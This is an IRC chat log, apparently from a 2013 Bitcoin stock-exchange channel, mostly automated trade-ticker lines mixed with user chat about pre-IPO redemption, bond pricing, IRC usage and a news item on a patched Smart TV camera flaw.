17:36:57 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002986 BTC [+] Aug 02 17:36:59 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 02 17:37:23 [BTCTC] [BTCGARDEN] 1241 @ 0.016 = 19.856 BTC [+] Aug 02 17:37:26 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 02 17:37:29 [HAVELOCK] [AM100] 4 @ 0.03765 = 0.1506 BTC [-] Aug 02 17:37:31 [HAVELOCK] [AM100] 3 @ 0.0376 = 0.1128 BTC [-] Aug 02 17:37:34 [HAVELOCK] [AM100] 1 @ 0.0375 BTC [-] Aug 02 17:37:36 [HAVELOCK] [AM100] 5 @ 0.0375 = 0.1875 BTC [-] Aug 02 17:37:38 [HAVELOCK] [AM100] 3 @ 0.0374 = 0.1122 BTC [-] Aug 02 17:37:40 [HAVELOCK] [AM100] 107 @ 0.0373001 = 3.9911 BTC [-] Aug 02 17:37:42 [HAVELOCK] [AM100] 3 @ 0.0373 = 0.1119 BTC [-] Aug 02 17:37:44 [HAVELOCK] [AM100] 200 @ 0.03725 = 7.45 BTC [-] Aug 02 17:37:45 [HAVELOCK] [AM100] 2 @ 0.03721 = 0.0744 BTC [-] Aug 02 17:37:47 [HAVELOCK] [AM100] 72 @ 0.03720001 = 2.6784 BTC [-] Aug 02 17:38:46 [BTCTC] [BTCGARDEN] 75 @ 0.016 = 1.2 BTC [+] Aug 02 17:38:49 [BTCTC] [TAT.ASICMINER] 35 @ 0.04098 = 1.4343 BTC [-] Aug 02 17:38:51 [BTCTC] [TAT.ASICMINER] 5 @ 0.04091 = 0.2046 BTC [-] Aug 02 17:38:52 [BTCTC] [TAT.ASICMINER] 68 @ 0.04081 = 2.7751 BTC [-] Aug 02 17:38:53 [BTCTC] [TAT.ASICMINER] 92 @ 0.0408 = 3.7536 BTC [-] Aug 02 17:39:04 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 02 17:39:05 [HAVELOCK] [AM100] 116 @ 0.03720001 = 4.3152 BTC [-] Aug 02 17:40:06 [HAVELOCK] [AM100] 18 @ 0.03720001 = 0.6696 BTC [-] Aug 02 17:40:15 [HAVELOCK] [AM100] 4 @ 0.03720001 = 0.1488 BTC [-] Aug 02 17:40:40 [HAVELOCK] [AM100] 25 @ 0.03720001 = 0.93 BTC [-] Aug 02 17:40:59 [BTCTC] [LABCOIN] 17 @ 0.002001 = 0.034 BTC [-] Aug 02 17:41:01 [BTCTC] [LABCOIN] 6377 @ 0.002 = 12.754 BTC [-] Aug 02 17:41:14 [BTCTC] [BTCGARDEN] 1500 @ 0.016 = 24 BTC [+] Aug 02 17:41:35 [BTCTC] [DMS.MINING] 116 @ 0.012 = 1.392 BTC [-] Aug 02 17:41:36 [BTCTC] [DMS.MINING] 100 @ 0.012 = 1.2 BTC [-] Aug 02 17:41:50 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 02 17:41:58 [BTCTC] [LABCOIN] 6409 @ 0.002 = 12.818 BTC [-] Aug 02 17:42:00 [BTCTC] [LABCOIN] 400 @ 0.002 = 0.8 BTC [-] Aug 02 17:42:13 [BTCTC] [ACTIVEMINING] 25 @ 0.005861 = 0.1465 BTC [-] Aug 02 17:42:13 [MPEX] [S.MPOE] 3150 @ 0.00081863 = 2.5787 BTC [-] Aug 02 17:42:20 [BTCTC] [GSDPT] 51 @ 0.0005021 = 0.0256 BTC [+] Aug 02 17:42:22 [BTCTC] [GSDPT] 1949 @ 0.000502 = 0.9784 BTC [-] Aug 02 17:42:32 [BTCTC] [DMS.MINING] 100 @ 0.0129 = 1.29 BTC [+] Aug 02 17:42:33 [BTCTC] [DMS.MINING] 84 @ 0.01299 = 1.0912 BTC [+] Aug 02 17:42:39 so i have a question nobody seems to be asked... Aug 02 17:42:43 TAT Aug 02 17:42:45 [BTCTC] [S.MPOE-PT] 4 @ 0.0009397 = 0.0038 BTC [+] Aug 02 17:43:18 [BTCTC] [BTCGARDEN] 542 @ 0.016 = 8.672 BTC [+] Aug 02 17:43:43 does this mean that whatever your next IPO is could (in theory) be sold out before it even opens? Aug 02 17:44:22 [BTCTC] [COG.F] 1 @ 1 BTC [-] Aug 02 17:45:14 [MPEX] [S.MPOE] 3823 @ 0.00082289 = 3.1459 BTC [+] Aug 02 17:45:17 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 02 17:46:00 [BTCTC] [GSDPT] 1043 @ 0.000502 = 0.5236 BTC [-] Aug 02 17:46:01 [BTCTC] [GSDPT] 57 @ 0.000501 = 0.0286 BTC [-] Aug 02 17:46:15 [10:43] does this mean that whatever your next IPO is could (in theory) be sold out before it even opens? <<< In theory, yes Aug 02 17:46:24 thought so Aug 02 17:46:58 [HAVELOCK] [AM100] 98 @ 0.03720001 = 3.6456 BTC [-] Aug 02 17:47:24 guess everyone is being quiet about this thing because they don't want to pump and dump this one Aug 02 17:47:34 [HAVELOCK] [SMG] 1 @ 0.00024669 BTC [+] Aug 02 17:47:39 [BTCTC] [BTCGARDEN] 9 @ 0.016 = 0.144 BTC [+] Aug 02 17:47:52 it's harder to pump and dump bonds when they're being sold at a fixed rate Aug 02 17:47:54 it will be very difficult to pump it Aug 02 17:48:07 [HAVELOCK] [AM1] 1 @ 4.1 BTC [+] Aug 02 17:48:10 [BTCTC] [COG.F] 1 @ 10.5 BTC [+] Aug 02 17:48:36 [BTCTC] [BTCGARDEN] 12 @ 0.016 = 0.192 BTC [+] Aug 02 17:48:51 oh... fixed rate? sorry newb here... hi Aug 02 17:49:00 so it can't go up in value? Aug 02 17:49:07 unless we manage a Sandstorm Aug 02 17:49:15 to do Aug 02 17:49:25 [BTCTC] [BTCGARDEN] 80 @ 0.016 = 1.28 BTC [+] Aug 02 17:49:58 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 02 17:50:15 Wild0wne_: people will be able to pay more than face value if they want to. but it woulndn't be a very good idea Aug 02 17:50:38 I can buyback at 105% Aug 02 17:51:03 oh Aug 02 17:51:12 [HAVELOCK] [SMG] 1 @ 0.00024669 BTC [+] Aug 02 17:51:22 man i got so much to learn Aug 02 17:51:41 [BTCTC] [GSDPT] 149 @ 0.000502 = 0.0748 BTC [+] Aug 02 17:52:07 [BTCTC] [LABCOIN] 50 @ 0.002049 = 0.1025 BTC [+] Aug 02 17:52:07 [BTCTC] [LABCOIN] 300 @ 0.00205 = 0.615 BTC [+] Aug 02 17:52:17 [BTCTC] [LABCOIN] 235 @ 0.00205 = 0.4818 BTC [+] Aug 02 17:52:36 [HAVELOCK] [AM100] 15 @ 0.038 = 0.57 BTC [+] Aug 02 17:53:07 [HAVELOCK] [AM100] 11 @ 0.0381 = 0.4191 BTC [+] Aug 02 17:53:10 [BTCTC] [LABCOIN] 100 @ 0.001992 = 0.1992 BTC [-] Aug 02 17:53:11 [BTCTC] [LABCOIN] 320 @ 0.001991 = 0.6371 BTC [-] Aug 02 17:53:12 [BTCTC] [LABCOIN] 580 @ 0.00199 = 1.1542 BTC [-] Aug 02 17:53:20 [BTCTC] [BTCGARDEN] 13 @ 0.016 = 0.208 BTC [+] Aug 02 17:53:22 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 02 17:53:40 [BTCTC] [ACTIVEMINING] 25 @ 0.005998 = 0.15 BTC [+] Aug 02 17:53:41 [BTCTC] [BTCGARDEN] 125 @ 0.016 = 2 BTC [+] Aug 02 17:53:41 [BTCTC] [ACTIVEMINING] 10 @ 0.005998 = 0.06 BTC [+] Aug 02 17:53:58 [MPEX] [S.MPOE] 16084 @ 0.00081863 = 13.1668 BTC [-] Aug 02 17:54:32 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 02 17:54:41 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 02 17:54:42 [BTCTC] [ACTIVEMINING] 25 @ 0.005861 = 0.1465 BTC [-] Aug 02 17:54:44 [BTCTC] [ACTIVEMINING] 538 @ 0.00586 = 3.1527 BTC [-] Aug 02 17:54:47 [HAVELOCK] [LABCO] 1 @ 0.002499 BTC [+] Aug 02 17:55:03 so will there be any way for people to know a new IPO of your is being bought up via the Pre-IPO redemption? Aug 02 17:55:18 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 02 17:55:29 [HAVELOCK] [LABCO] 10 @ 0.002499 = 0.025 BTC [+] Aug 02 17:55:50 [BTCTC] [ACTIVEMINING] 25 @ 0.005861 = 0.1465 BTC [+] Aug 02 17:55:50 [BTCTC] [ACTIVEMINING] 20 @ 0.005861 = 0.1172 BTC [+] Aug 02 17:55:52 [BTCTC] [ACTIVEMINING] 355 @ 0.00586 = 2.0803 BTC [-] Aug 02 17:55:54 i mean since its via email... and its first come first serve.... the IPO then is sort of happening in your email box Aug 02 17:56:03 Each IPO will be announced ahead of time, and a timeframe will be set for Pre-IPO redemption exchanges Aug 02 17:56:17 no Aug 02 17:56:22 i dont have an email list Aug 02 17:56:41 people will get news from the exchanges, and from forums, reddit, etc Aug 02 17:56:44 [HAVELOCK] [LABCO] 1 @ 0.002499 BTC [+] Aug 02 17:56:56 [BTCTC] [DMS.MINING] 97 @ 0.01026 = 0.9952 BTC [-] Aug 02 17:56:57 [BTCTC] [DMS.MINING] 100 @ 0.01026 = 1.026 BTC [-] Aug 02 17:56:59 [BTCTC] [DMS.MINING] 20 @ 0.01025 = 0.205 BTC [-] Aug 02 17:57:00 [BTCTC] [DMS.MINING] 1 @ 0.01024 BTC [-] Aug 02 17:57:01 [BTCTC] [DMS.MINING] 47 @ 0.01019 = 0.4789 BTC [-] Aug 02 17:57:16 maybe we'll set up an official announcement method Aug 02 17:57:23 [BTCTC] [ACTIVEMINING] 1 @ 0.005992 BTC [+] Aug 02 17:57:23 RSS feed or email list or such Aug 02 17:57:51 [BTCTC] [COG.F] 1 @ 1 BTC [-] Aug 02 17:59:17 [BTCTC] [ACTIVEMINING] 17 @ 0.005988 = 0.1018 BTC [-] Aug 02 17:59:19 irc channel? Aug 02 17:59:22 XBOND? Aug 02 17:59:25 yes Aug 02 17:59:29 oh Aug 02 17:59:29 no Aug 02 17:59:44 i dont think the world is ready for a TATI channel yet Aug 02 17:59:56 heh Aug 02 18:00:17 just take over #HavelockInvestments :p Aug 02 18:00:20 [BTCTC] [ASICMINER-PT] 4 @ 4.177 = 16.708 BTC [+] Aug 02 18:00:38 [BTCTC] [GSDPT] 100 @ 0.000502 = 0.0502 BTC [+] Aug 02 18:00:59 jbond? Aug 02 18:01:30 [BTCTC] [ACTIVEMINING] 25 @ 0.005861 = 0.1465 BTC [-] Aug 02 18:01:31 bailbond? Aug 02 18:01:31 [BTCTC] [ACTIVEMINING] 665 @ 0.00586 = 3.8969 BTC [-] Aug 02 18:01:44 [BTCTC] [ACTIVEMINING] 25 @ 0.005861 = 0.1465 BTC [+] Aug 02 18:01:45 [BTCTC] [ACTIVEMINING] 3911 @ 0.00586 = 22.9185 BTC [-] Aug 02 18:01:47 [BTCTC] [KENILWORTH] 50 @ 0.00175 = 0.0875 BTC [-] Aug 02 18:02:01 when does xbond unlock :P Aug 02 18:02:08 2 hours Aug 02 18:02:22 BOO Aug 02 18:02:53 why you crying string? Aug 02 18:02:56 [HAVELOCK] [SDSTM] 30 @ 0.00750001 = 0.225 BTC [-] Aug 02 18:02:58 I threw money at Havelock Aug 02 18:03:37 [BTCTC] [BTCGARDEN] 214 @ 0.016 = 3.424 BTC [+] Aug 02 18:03:42 ;;calc 4+4 Aug 02 18:03:43 8 Aug 02 18:03:52 ;;calc .004 * 0.5 Aug 02 18:03:53 0.002 Aug 02 18:04:20 0.0005 * .5 Aug 02 18:04:25 ;;calc 0.0005 * .5 Aug 02 18:04:26 0.00025 Aug 02 18:04:49 oh Aug 02 18:05:28 [HAVELOCK] [LABCO] 150 @ 0.002499 = 0.3749 BTC [+] Aug 02 18:05:59 [BTCTC] [BTCGARDEN] 1434 @ 0.016 = 22.944 BTC [+] Aug 02 18:06:31 [BTCTC] [GSDPT] 117 @ 0.000502 = 0.0587 BTC [+] Aug 02 18:06:53 http://www.slate.com/articles/news_and_politics/politics/2013/07/nsa_lexicon_how_james_clapper_and_other_u_s_officials_mislead_the_american.html Aug 02 18:06:56 NSA lexicon: How James Clapper and other U.S. officials mislead the American public without lying. - Aug 02 18:08:13 I like the whole new CIA fiasco that came up with Bengzia Aug 02 18:08:25 [MPEX] [S.MPOE] 10097 @ 0.00081863 = 8.2657 BTC [-] Aug 02 18:08:27 [MPEX] [S.MPOE] 4100 @ 0.00081847 = 3.3557 BTC [-] Aug 02 18:08:30 [MPEX] [S.MPOE] 13303 @ 0.0008182 = 10.8845 BTC [-] Aug 02 18:08:43 [BTCTC] [TAT.ASICMINER] 18 @ 0.04109 = 0.7396 BTC [+] Aug 02 18:09:28 [BTCTC] [LABCOIN] 242 @ 0.001991 = 0.4818 BTC [+] Aug 02 18:09:29 [BTCTC] [LABCOIN] 652 @ 0.00199 = 1.2975 BTC [-] Aug 02 18:09:31 [BTCTC] [LABCOIN] 950 @ 0.00199 = 1.8905 BTC [-] Aug 02 18:09:33 [BTCTC] [LABCOIN] 100 @ 0.00199 = 0.199 BTC [-] Aug 02 18:09:34 [BTCTC] [LABCOIN] 100 @ 0.00196 = 0.196 BTC [-] Aug 02 18:09:35 [BTCTC] [LABCOIN] 150 @ 0.00195 = 0.2925 BTC [-] Aug 02 18:09:35 [BTCTC] [LABCOIN] 523 @ 0.001906 = 0.9968 BTC [-] Aug 02 18:09:37 [BTCTC] [LABCOIN] 130 @ 0.001905 = 0.2477 BTC [-] Aug 02 18:09:38 [BTCTC] [LABCOIN] 285 @ 0.001904 = 0.5426 BTC [-] Aug 02 18:09:39 [BTCTC] [LABCOIN] 300 @ 0.001902 = 0.5706 BTC [-] Aug 02 18:09:40 [BTCTC] [LABCOIN] 2200 @ 0.001902 = 4.1844 BTC [-] Aug 02 18:09:41 [BTCTC] [LABCOIN] 500 @ 0.001901 = 0.9505 BTC [-] Aug 02 18:09:42 [BTCTC] [LABCOIN] 3868 @ 0.001901 = 7.3531 BTC [-] Aug 02 18:10:02 [BTCTC] [GSDPT] 100 @ 0.000502 = 0.0502 BTC [+] Aug 02 18:10:29 [BTCTC] [LABCOIN] 50 @ 0.002043 = 0.1022 BTC [+] Aug 02 18:10:30 [BTCTC] [LABCOIN] 66 @ 0.002044 = 0.1349 BTC [+] Aug 02 18:10:31 [BTCTC] [LABCOIN] 284 @ 0.002045 = 0.5808 BTC [+] Aug 02 18:10:43 [BTCTC] [TAT.ASICMINER] 24 @ 0.04109 = 0.9862 BTC [+] Aug 02 18:10:47 [HAVELOCK] [LABCO] 50 @ 0.0023 = 0.115 BTC [-] Aug 02 18:10:49 [HAVELOCK] [LABCO] 10 @ 0.002299 = 0.023 BTC [-] Aug 02 18:10:52 [HAVELOCK] [LABCO] 340 @ 0.00221003 = 0.7514 BTC [-] Aug 02 18:11:49 [BTCTC] [LABCOIN] 70 @ 0.001902 = 0.1331 BTC [-] Aug 02 18:11:51 [BTCTC] [LABCOIN] 132 @ 0.001901 = 0.2509 BTC [-] Aug 02 18:11:52 [BTCTC] [LABCOIN] 5000 @ 0.001901 = 9.505 BTC [-] Aug 02 18:11:54 [BTCTC] [LABCOIN] 50 @ 0.0019 = 0.095 BTC [-] Aug 02 18:11:55 [BTCTC] [LABCOIN] 30 @ 0.00189 = 0.0567 BTC [-] Aug 02 18:11:56 [BTCTC] [LABCOIN] 20 @ 0.00189 = 0.0378 BTC [-] Aug 02 18:11:58 [BTCTC] [LABCOIN] 698 @ 0.001887 = 1.3171 BTC [-] Aug 02 18:13:12 [BTCTC] [ACTIVEMINING] 25 @ 0.005996 = 0.1499 BTC [+] Aug 02 18:13:48 [HAVELOCK] [SDSTM] 136 @ 0.00750001 = 1.02 BTC [-] Aug 02 18:13:54 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 02 18:14:15 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 02 18:15:29 [BTCTC] [LABCOIN] 2 @ 0.001998 = 0.004 BTC [+] Aug 02 18:17:10 [BTCTC] [BTCGARDEN] 2000 @ 0.016 = 32 BTC [+] Aug 02 18:18:18 [BTCTC] [LABCOIN] 86 @ 0.001996 = 0.1717 BTC [-] Aug 02 18:18:20 [BTCTC] [LABCOIN] 414 @ 0.001997 = 0.8268 BTC [+] Aug 02 18:18:46 [HAVELOCK] [LABCO] 500 @ 0.0019 = 0.95 BTC [-] Aug 02 18:19:38 [BTCTC] [BTCGARDEN] 1493 @ 0.016 = 23.888 BTC [+] Aug 02 18:19:47 [BTCTC] [DMS.MINING] 6 @ 0.011 = 0.066 BTC [+] Aug 02 18:21:18 [BTCTC] [TAT.ASICMINER] 8 @ 0.0408 = 0.3264 BTC [-] Aug 02 18:21:19 [BTCTC] [TAT.ASICMINER] 27 @ 0.0408 = 1.1016 BTC [-] Aug 02 18:21:40 [BTCTC] [TAT.ASICMINER] 15 @ 0.0408 = 0.612 BTC [-] Aug 02 18:22:39 [BTCTC] [BTCGARDEN] 104 @ 0.016 = 1.664 BTC [+] Aug 02 18:22:57 [BTCTC] [BASIC-MINING] 2 @ 0.45 = 0.9 BTC [+] Aug 02 18:23:25 [BTCTC] [ACTIVEMINING] 46 @ 0.005996 = 0.2758 BTC [+] Aug 02 18:23:27 [BTCTC] [ACTIVEMINING] 473 @ 0.005843 = 2.7637 BTC [-] Aug 02 18:23:28 [BTCTC] [ACTIVEMINING] 887 @ 0.00584 = 5.1801 BTC [-] Aug 02 18:23:37 what is the command to switch back to my registered nick? Aug 02 18:23:42 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 02 18:24:01 thought it was just /nick Wild0wnes Aug 02 18:24:08 [BTCTC] [DMS.MINING] 18 @ 0.011 = 0.198 BTC [+] Aug 02 18:24:13 [BTCTC] [LABCOIN] 1 @ 0.001996 BTC [-] Aug 02 18:24:24 It usually is. Which client? Aug 02 18:24:32 LImeChat Aug 02 18:24:43 [BTCTC] [ACTIVEMINING] 25 @ 0.005809 = 0.1452 BTC [-] Aug 02 18:24:44 [BTCTC] [ACTIVEMINING] 13 @ 0.005808 = 0.0755 BTC [-] Aug 02 18:24:46 [BTCTC] [ACTIVEMINING] 30 @ 0.005805 = 0.1742 BTC [-] Aug 02 18:24:48 [BTCTC] [ACTIVEMINING] 64 @ 0.005802 = 0.3713 BTC [-] Aug 02 18:24:49 [BTCTC] [ACTIVEMINING] 50 @ 0.005801 = 0.2901 BTC [-] Aug 02 18:24:56 [BTCTC] [DMS.MINING] 100 @ 0.011 = 1.1 BTC [+] Aug 02 18:25:34 [BTCTC] [DMS.MINING] 100 @ 0.011 = 1.1 BTC [+] Aug 02 18:25:41 [BTCTC] [BTCGARDEN] 20 @ 0.01599 = 0.3198 BTC [-] Aug 02 18:26:12 [BTCTC] [BTCGARDEN] 10 @ 0.01599 = 0.1599 BTC [-] Aug 02 18:26:24 [BTCTC] [BTCGARDEN] 60 @ 0.016 = 0.96 BTC [+] Aug 02 18:26:33 [BTCTC] [DMS.MINING] 40 @ 0.011 = 0.44 BTC [+] Aug 02 18:27:12 [BTCTC] [TAT.ASICMINER] 8 @ 0.0407 = 0.3256 BTC [-] Aug 02 18:27:30 [BTCTC] [TAT.ASICMINER] 3 @ 0.04023 = 0.1207 BTC [-] Aug 02 18:27:38 guess if i don't identify in 30 seconds when i first get on it renames me Aug 02 18:27:56 IRC = VOODOO Aug 02 18:28:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.04107 BTC [+] Aug 02 18:28:54 [BTCTC] [DMS.MINING] 36 @ 0.011 = 0.396 BTC [+] Aug 02 18:28:56 [BTCTC] [DMS.MINING] 20 @ 0.011 = 0.22 BTC [+] Aug 02 18:29:01 IRC = requires learning a thing. Aug 02 18:29:22 Intelligence Rarely Common Aug 02 18:29:23 requires mind time travel.... Aug 02 18:29:56 [BTCTC] [DMS.MINING] 42 @ 0.01019 = 0.428 BTC [-] Aug 02 18:30:11 [BTCTC] [TAT.ASICMINER] 16 @ 0.04023 = 0.6437 BTC [-] Aug 02 18:30:13 [BTCTC] [TAT.ASICMINER] 32 @ 0.04022 = 1.287 BTC [-] Aug 02 18:30:56 [BTCTC] [BTCGARDEN] 900 @ 0.016 = 14.4 BTC [+] Aug 02 18:31:26 [BTCTC] [DMS.PURCHASE] 29 @ 0.034 = 0.986 BTC [+] Aug 02 18:31:41 [BTCTC] [DMS.PURCHASE] 11 @ 0.03401 = 0.3741 BTC [+] Aug 02 18:31:54 [MPEX] [S.MPOE] 10537 @ 0.00082289 = 8.6708 BTC [+] Aug 02 18:31:55 [MPEX] [S.MPOE] 16913 @ 0.00082371 = 13.9314 BTC [+] Aug 02 18:32:16 [BTCTC] [BTCGARDEN] 30 @ 0.016 = 0.48 BTC [+] Aug 02 18:32:28 [BTCTC] [TAT.MINIGAME] 1644 @ 0.00024 = 0.3946 BTC [-] Aug 02 18:32:31 [BTCTC] [BTCGARDEN] 2400 @ 0.016 = 38.4 BTC [+] Aug 02 18:32:54 [BTCTC] [LABCOIN] 50 @ 0.001955 = 0.0978 BTC [-] Aug 02 18:33:01 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 02 18:33:39 sos TAT, has Pre-IPO period been defined yet? Aug 02 18:33:44 [BTCTC] [BTCGARDEN] 20 @ 0.016 = 0.32 BTC [+] Aug 02 18:34:09 no, and it will probably vary Aug 02 18:34:22 [BTCTC] [LABCOIN] 50 @ 0.001996 = 0.0998 BTC [+] Aug 02 18:34:23 [BTCTC] [LABCOIN] 107 @ 0.001997 = 0.2137 BTC [+] Aug 02 18:34:23 [BTCTC] [BTCGARDEN] 5000 @ 0.016 = 80 BTC [+] Aug 02 18:34:24 [BTCTC] [LABCOIN] 119 @ 0.001999 = 0.2379 BTC [+] Aug 02 18:34:26 [BTCTC] [LABCOIN] 1000 @ 0.001999 = 1.999 BTC [+] Aug 02 18:34:27 [BTCTC] [LABCOIN] 15 @ 0.002 = 0.03 BTC [+] Aug 02 18:34:28 [BTCTC] [BTC-BOND] 13 @ 0.009999 = 0.13 BTC [+] Aug 02 18:34:29 [BTCTC] [LABCOIN] 700 @ 0.002 = 1.4 BTC [+] Aug 02 18:34:31 [BTCTC] [LABCOIN] 1000 @ 0.002 = 2 BTC [+] Aug 02 18:35:04 will be more than 3 days tho ya? Aug 02 18:35:24 [BTCTC] [LABCOIN] 20 @ 0.002 = 0.04 BTC [+] Aug 02 18:35:33 [BTCTC] [ACTIVEMINING] 207 @ 0.005797 = 1.2 BTC [-] Aug 02 18:35:35 [BTCTC] [BTCGARDEN] 5 @ 0.016 = 0.08 BTC [+] Aug 02 18:35:42 [HAVELOCK] [AM100] 102 @ 0.0371011 = 3.7843 BTC [-] Aug 02 18:35:44 [HAVELOCK] [AM100] 10 @ 0.037101 = 0.371 BTC [-] Aug 02 18:35:46 [HAVELOCK] [AM100] 88 @ 0.0371 = 3.2648 BTC [-] Aug 02 18:35:51 "The flaws in Samsung Smart TVs, which have now been patched, enabled hackers to remotely turn on the TVs' built-in cameras without leaving any trace of it on the screen. While you're watching TV, a hacker anywhere around the world could have been watching you. " Aug 02 18:36:00 why the fuck would a tv come witha built in camera Aug 02 18:36:09 what's next, the cunt with built in cock ?! Aug 02 18:36:40 the xxxbox has one stuck in on as well doesn't it? Aug 02 18:36:53 i have no idea Aug 02 18:36:56 i mean xbox 3 Aug 02 18:37:11 xbox one... whatever Aug 02 18:37:57 [BTCTC] [ACTIVEMINING] 25 @ 0.005705 = 0.1426 BTC [-] Aug 02 18:38:04 I think, so you can watch yourself on tv and be like "I'm famous" Aug 02 18:38:25 ridoinkulous Aug 02 18:38:26 [BTCTC] [BTCGARDEN] 5 @ 0.016 = 0.08 BTC [+] Aug 02 18:38:28 I see myself on tv everyday Aug 02 18:38:36 [BTCTC] [BTCGARDEN] 310 @ 0.016 = 4.96 BTC [+] Aug 02 18:38:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.04106 BTC [+] Aug 02 18:39:01 you guys are meowmeows Aug 02 18:39:04 TAT just trying to figure out if there will be IPOs that I couldn't pre-IPO into with under 10 bitcoins Aug 02 18:39:13 [BTCTC] [ASICMINER-PT] 2 @ 4.121 = 8.242 BTC [-] Aug 02 18:39:14 [BTCTC] [ASICMINER-PT] 5 @ 4.12 = 20.6 BTC [-] Aug 02 18:39:16 [BTCTC] [ASICMINER-PT] 5 @ 4.111 = 20.555 BTC [-] Aug 02 18:39:16 1-3 days Aug 02 18:39:17 [BTCTC] [ASICMINER-PT] 3 @ 4.11 = 12.33 BTC [-] Aug 02 18:39:17 [BTCTC] [ASICMINER-PT] 1 @ 4.177 BTC [+] Aug 02 18:39:18 [BTCTC] [ASICMINER-PT] 1 @ 4.177 BTC [+] Aug 02 18:39:28 allow for redemption Aug 02 18:39:30 [BTCTC] [ACTIVEMINING] 18 @ 0.005704 = 0.1027 BTC [-] Aug 02 18:39:38 is there an asset list on BTCT like on BF with all the shares held and sorted to one anonymous btc address? Aug 02 18:39:40 [BTCTC] [ASICMINER-PT] 3 @ 4.199 = 12.597 BTC [+] Aug 02 18:39:50 no Aug 02 18:40:14 [BTCTC] [ACTIVEMINING] 50 @ 0.005701 = 0.2851 BTC [-] Aug 02 18:40:15 [BTCTC] [ACTIVEMINING] 50 @ 0.005601 = 0.2801 BTC [-] Aug 02 18:40:17 :/ Aug 02 18:40:17 [BTCTC] [ACTIVEMINING] 12 @ 0.005517 = 0.0662 BTC [-] Aug 02 18:40:18 [BTCTC] [ACTIVEMINING] 50 @ 0.005516 = 0.2758 BTC [-] Aug 02 18:40:19 [BTCTC] [ACTIVEMINING] 658 @ 0.005502 = 3.6203 BTC [-] Aug 02 18:40:20 [BTCTC] [ACTIVEMINING] 18 @ 0.005501 = 0.099 BTC [-] Aug 02 18:40:21 [BTCTC] [ACTIVEMINING] 500 @ 0.005501 = 2.7505 BTC [-] Aug 02 18:40:21 [BTCTC] [ACTIVEMINING] 668 @ 0.0055 = 3.674 BTC [-] Aug 02 18:40:34 [BTCTC] [CRYPTO-TRADE] 3 @ 0.1997 = 0.5991 BTC [+] Aug 02 18:40:36 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1997 BTC [+] Aug 02 18:40:44 [HAVELOCK] [LABCO] 82 @ 0.0022 = 0.1804 BTC [+] Aug 02 18:41:02 [BTCTC] [DMS.PURCHASE] 15 @ 0.03401 = 0.5102 BTC [+] Aug 02 18:41:03 samsung smart tv = telescreen? Aug 02 18:41:22 [BTCTC] [LABCOIN] 139 @ 0.002 = 0.278 BTC [+] Aug 02 18:41:24 [BTCTC] [LABCOIN] 11 @ 0.002 = 0.022 BTC [+] Aug 02 18:41:35 because user interfaces Aug 02 18:41:39 and watching people who watch ads Aug 02 18:41:41 mois how is that ? Aug 02 18:42:06 [BTCTC] [BTCGARDEN] 259 @ 0.016 = 4.144 BTC [+] Aug 02 18:42:07 [BTCTC] [LABCOIN] 489 @ 0.002 = 0.978 BTC [+] Aug 02 18:42:21 [BTCTC] [ACTIVEMINING] 94 @ 0.005519 = 0.5188 BTC [+] Aug 02 18:42:22 [BTCTC] [LABCOIN] 11 @ 0.002 = 0.022 BTC [+] Aug 02 18:42:23 [BTCTC] [LABCOIN] 40 @ 0.002038 = 0.0815 BTC [+] Aug 02 18:42:34 [BTCTC] [ACTIVEMINING] 96 @ 0.005519 = 0.5298 BTC [+] Aug 02 18:42:49 sorry can't post yet on bitcointalk i'm I asking too many questions? I don't want to be the annoying guy Aug 02 18:43:00 [BTCTC] [LABCOIN] 40 @ 0.002038 = 0.0815 BTC [+] Aug 02 18:43:03 [BTCTC] [LABCOIN] 50 @ 0.002039 = 0.102 BTC [+] Aug 02 18:43:08 you're not the annoying guy. Aug 02 18:43:24 [BTCTC] [BTCGARDEN] 542 @ 0.016 = 8.672 BTC [+] Aug 02 18:43:45 [BTCTC] [LABCOIN] 100 @ 0.00204 = 0.204 BTC [+] Aug 02 18:43:55 [BTCTC] [LABCOIN] 5 @ 0.00204 = 0.0102 BTC [+] Aug 02 18:43:58 [BTCTC] [BTCGARDEN] 4650 @ 0.016 = 74.4 BTC [+] Aug 02 18:43:58 who's the annoying guy then? Aug 02 18:43:59 [BTCTC] [LABCOIN] 450 @ 0.002039 = 0.9176 BTC [-] Aug 02 18:44:01 [BTCTC] [LABCOIN] 9 @ 0.002038 = 0.0183 BTC [-] Aug 02 18:44:06 mircea_popescu: was just wondering, what is stopping some scammer from buying some of his own IPO shares, transfer the BTC he received back into his BTCT acc and buy some again...just to generate some kind of hype...would be nice to see if there are some people out there whos shares hold get bigger like this. Aug 02 18:44:30 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 02 18:44:32 [BTCTC] [LABCOIN] 32 @ 0.002039 = 0.0652 BTC [+] Aug 02 18:44:33 [BTCTC] [LABCOIN] 68 @ 0.00204 = 0.1387 BTC [+] Aug 02 18:44:49 [BTCTC] [BTCGARDEN] 30 @ 0.016 = 0.48 BTC [+] Aug 02 18:44:57 mois nothing. Aug 02 18:45:08 http://trilema.com/2013/the-anatomy-of-a-scam/ Aug 02 18:45:10 oh wow Aug 02 18:45:14 The anatomy of a scam. pe Trilema - Un blog de Mircea Popescu. Aug 02 18:45:14 mois already happened Aug 02 18:45:18 it's why burnside's name is in there. Aug 02 18:45:33 you should probably read the past coupla day's logs here. Aug 02 18:45:34 [BTCTC] [ACTIVEMINING] 25 @ 0.005501 = 0.1375 BTC [-] Aug 02 